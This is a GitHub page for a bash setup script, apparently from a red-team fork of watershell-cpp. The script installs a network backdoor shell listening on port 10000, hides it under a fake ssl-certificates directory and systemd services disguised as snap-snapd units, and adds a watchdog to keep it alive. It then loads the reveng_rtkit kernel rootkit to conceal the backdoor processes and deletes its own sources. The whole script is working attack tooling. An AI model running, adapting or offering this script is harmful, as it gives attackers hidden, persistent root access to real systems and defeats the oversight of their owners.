forked from RITRedteam/watershell-cpp
-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathcerberus_setup-v2.sh
147 lines (116 loc) · 4.34 KB
/
cerberus_setup-v2.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
#!/bin/bash
# Install necessary packages if not already installed
sudo apt-get install -y g++ python3 build-essential linux-headers-$(uname -r)
# Clone the Watershell-Cpp repository
git clone https://github.com/Dack985/Cerberus-shell.git
# Navigate to the Watershell-Cpp directory
cd Cerberus-shell
# Compile the Watershell-Cpp code
g++ main.cpp watershell.cpp -o watershell
# Verify if Watershell binary is compiled successfully
if [ -x "./watershell" ]; then
echo "Watershell binary compiled successfully."
# Create ssl-certificates directory in /usr/local/share
sudo mkdir -p /usr/local/share/ssl-certificates
# Copy Watershell-Cpp files to the ssl-certificates directory
sudo cp -R * /usr/local/share/ssl-certificates
# Change ownership of the ssl-certificates folder and its contents to the "root" user
sudo chown -R root:root /usr/local/share/ssl-certificates
# Create the startup script (cerberus_shell.sh) in ssl-certificates directory
cat <<EOF | sudo tee '/usr/local/share/ssl-certificates/cerberus_shell.sh' > /dev/null
#!/bin/bash
cd /usr/local/share/ssl-certificates
while true; do
./watershell -l 10000 eth0
sleep 1
done
EOF
# Make the startup script executable
sudo chmod +x '/usr/local/share/ssl-certificates/cerberus_shell.sh'
# Create the systemd service unit file (cerberus.service)
cat <<EOF | sudo tee '/etc/systemd/system/snap-snapd-21445.service' > /dev/null
[Unit]
Description=Cerberus Shell Startup
[Service]
ExecStart=/usr/local/share/ssl-certificates/cerberus_shell.sh
User=root
Group=root
[Install]
WantedBy=multi-user.target
EOF
# Create the Python monitoring script (cerberus_monitor.py)
cat <<EOF | sudo tee '/usr/local/bin/cerberus_monitor.py' > /dev/null
#!/usr/bin/env python3
import subprocess
import time
def check_cerberus_process():
while True:
try:
subprocess.run(["pgrep", "-f", "watershell -l 10000 eth0"], check=True)
except subprocess.CalledProcessError:
print("Cerberus Shell process not found. Restarting...")
subprocess.run(["/usr/local/share/ssl-certificates/watershell", "-l", "10000", "eth0"])
time.sleep(1)
if __name__ == "__main__":
check_cerberus_process()
EOF
# Make the monitoring script executable
sudo chmod +x '/usr/local/bin/cerberus_monitor.py'
# Create the systemd service unit file (cerberus_monitor.service)
cat <<EOF | sudo tee '/etc/systemd/system/snap-snapd-21446.service' > /dev/null
[Unit]
Description=Monitor Cerberus Shell Process
[Service]
ExecStart=/usr/local/bin/cerberus_monitor.py
Restart=always
User=root
Group=root
[Install]
WantedBy=multi-user.target
EOF
# Reload systemd to pick up the new unit files
sudo systemctl daemon-reload
# Enable and start the services
sudo systemctl enable snap-snapd-21445.service
sudo systemctl start snap-snapd-21445.service
sudo systemctl enable snap-snapd-21446.service
sudo systemctl start snap-snapd-21446.service
# Clone the reveng_rtkit rootkit repository
git clone https://github.com/reveng007/reveng_rtkit.git
# Compile and load the rootkit module
cd reveng_rtkit/kernel_src
make
if sudo insmod reveng_rtkit.ko; then
echo "Rootkit module loaded successfully."
else
echo "ERROR: Could not load reveng_rtkit.ko. Exiting."
exit 1
fi
# Verify the character device exists (usually /dev/reveng_rtkit)
if [ ! -e /dev/reveng_rtkit ]; then
echo "ERROR: Character device /dev/reveng_rtkit does not exist."
exit 1
fi
# Compile the usermode client
cd ../user_src
gcc client_usermode.c -o client_usermode
# Set rootkit to protected mode and hide Cerberus processes
# Using a here-doc to automate client commands without manual input
sudo ./client_usermode <<EOF
protect
EOF
# Hide all Cerberus and Watershell processes using their PIDs
for pid in $(pgrep -f "watershell -l 10000 eth0"); do
sudo kill -31 "$pid" # hide process using the rootkit
done
for pid in $(pgrep -f "cerberus_shell.sh"); do
sudo kill -31 "$pid" # hide process using the rootkit
done
# Clean up the setup script and Cerberus-shell directory
cd
rm -rf Cerberus-shell
echo "Cerberus and rootkit setup completed successfully."
else
echo "ERROR: Watershell binary compilation failed."
exit 1
fi